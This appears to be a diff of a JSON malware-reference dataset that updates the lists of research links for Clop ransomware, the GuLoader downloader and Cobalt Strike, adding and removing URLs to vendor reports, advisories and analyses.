"https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/" ], @@ -11341,45 +12914,69 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.clop", "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", - "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", + "https://www.splunk.com/en_us/blog/security/detecting-clop-ransomware.html", + "https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever", "https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/", + "https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/", "https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/", + "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", - "https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/", + "https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", "https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/", "https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/", "https://github.com/Tera0017/TAFOF-Unpacker", + "https://asec.ahnlab.com/en/19542/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/", "https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/", "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", "https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.youtube.com/watch?v=PqGaZgepNTE", + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/", "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", - "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", "https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/", "https://twitter.com/darb0ng/status/1338692764121251840", + "https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26", - "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/", "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", - "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/" + "https://krebsonsecurity.com/2021/06/ukrainian-police-nab-six-tied-to-clop-ransomware/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf", + "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/", + "https://unit42.paloaltonetworks.com/clop-ransomware/" ], "synonyms": [], "type": [] @@ -11392,6 +12989,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye", + "https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195", "https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader", "https://labs.vipre.com/unloading-the-guloader/", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", @@ -11408,20 +13006,27 @@ "https://twitter.com/TheEnergyStory/status/1239110192060608513", "https://twitter.com/VK_Intel/status/1252678206852907011", "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", + "https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/", "https://twitter.com/sysopfb/status/1258809373159305216", "https://research.checkpoint.com/2020/guloader-cloudeye/", "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", "https://www.joesecurity.org/blog/3535317197858305930", "https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services", "https://twitter.com/VK_Intel/status/1257206565146370050", + "https://www.youtube.com/watch?v=-FxyzuRv6Wg", "https://blog.morphisec.com/guloader-the-rat-downloader", "https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/", "https://twitter.com/TheEnergyStory/status/1240608893610459138", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4", + "https://www.youtube.com/watch?v=K3Yxu_9OUxU", "https://www.crowdstrike.com/blog/guloader-malware-analysis/", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/", "https://malwation.com/malware-config-extraction-diaries-1-guloader/", + "https://www.youtube.com/watch?v=N0wAh26wShE", "https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/", - "https://labs.k7computing.com/?p=20156" + "https://labs.k7computing.com/?p=20156", + "https://labs.k7computing.com/?p=21725Lokesh" ], "synonyms": [ "GuLoader", @@ -11493,179 +13098,353 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.brighttalk.com/webcast/7451/462719", - "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", - "https://twitter.com/ffforward/status/1324281530026524672", - "https://community.riskiq.com/article/0bcefe76", - "https://www.hhs.gov/sites/default/files/bazarloader.pdf", - "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", - "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", + "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", + "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/", + "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims", "https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py", "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html", "https://www.secureworks.com/research/threat-profiles/bronze-president", - "https://blog.macnica.net/blog/2020/11/dtrack.html", - "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", - "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/", - "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", - "https://isc.sans.edu/diary/26752", + "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", + "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", - "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://twitter.com/TheDFIRReport/status/1356729371931860992", - "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", - "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", - "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/", - "https://401trg.com/burning-umbrella/ ", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", + "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", + "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html", "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", "https://github.com/sophos-cybersecurity/solarwinds-threathunt", - "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", - "https://twitter.com/AltShiftPrtScn/status/1350755169965924352", - "https://asec.ahnlab.com/ko/19860/", - "https://www.youtube.com/watch?v=gfYswA_Ronw", - "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware", + "https://twitter.com/AltShiftPrtScn/status/1385103712918642688", "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", + "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", + "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950", - "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", - "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", - "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims", - "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/", - "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", - "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", - "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", + "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/", + "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections", "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", - "https://malwarelab.eu/posts/fin6-cobalt-strike/", + "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/", "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", - "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam", - "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach", - "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure", + "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", + "https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought", "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/", - "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/", - "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", - "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", "https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", - "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/", "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/", - "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811", - "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/", - "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis", - "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", - "https://isc.sans.edu/diary/rss/26862", - "https://isc.sans.edu/diary/rss/27176", + "https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/", "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/", - "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/", - "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf", - "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", - "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", - "https://community.riskiq.com/article/f0320980", - "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", - "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", - "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", - "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html", - "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", - "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", - "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", - "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://github.com/Apr4h/CobaltStrikeScan", - "https://twitter.com/VK_Intel/status/1294320579311435776", - "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", - "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/", - "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/", - "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929", - "https://www.secureworks.com/research/threat-profiles/gold-niagara", - "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", - "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", - "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/", - "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt", - "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/", + "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + "https://blog.talosintelligence.com/2021/05/ctir-case-study.html", + "https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/", + "https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7", + "https://www.ic3.gov/Media/News/2021/210823.pdf", + "https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20", + "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", + "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", + "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", + "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/", + "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one", + "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/", + "https://securelist.com/apt-luminousmoth/103332/", + "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/", + "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/", + "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike", + "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/", "https://www.secureworks.com/research/threat-profiles/gold-dupont", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", - "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", - "https://www.cobaltstrike.com/support", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://www.qurium.org/alerts/targeted-malware-against-crph/", "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", + "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/", + "https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/", + "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf", + "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures", + "https://twitter.com/MBThreatIntel/status/1412518446013812737", + "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html", + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", + "https://www.cynet.com/understanding-squirrelwaffle/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang", + "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://twitter.com/vikas891/status/1385306823662587905", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://malwarebookreports.com/cryptone-cobalt-strike/", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/", + "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://www.brighttalk.com/webcast/7451/462719", + "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://blog.group-ib.com/REvil_RaaS", + "https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718", + "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/", + "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/", + "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", + "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728", + "https://www.macnica.net/file/mpression_automobile.pdf", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf", + "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", + "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", + "https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/", + "https://asec.ahnlab.com/ko/19860/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021", + "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64", + "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-148a", + "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", + "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", + "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", + "https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811", + "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153", + "https://connormcgarr.github.io/thread-hijacking/", + "https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/", + "https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups", + "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41", + "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/", + "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", + "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5", + "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", + "https://isc.sans.edu/diary/rss/27176", + "https://community.riskiq.com/article/c88cf7e6", + "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/542/original/CTIR_casestudy_2.pdf", + "https://community.riskiq.com/article/f0320980", + "https://www.youtube.com/watch?v=ysN-MqyIN7M", + "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", 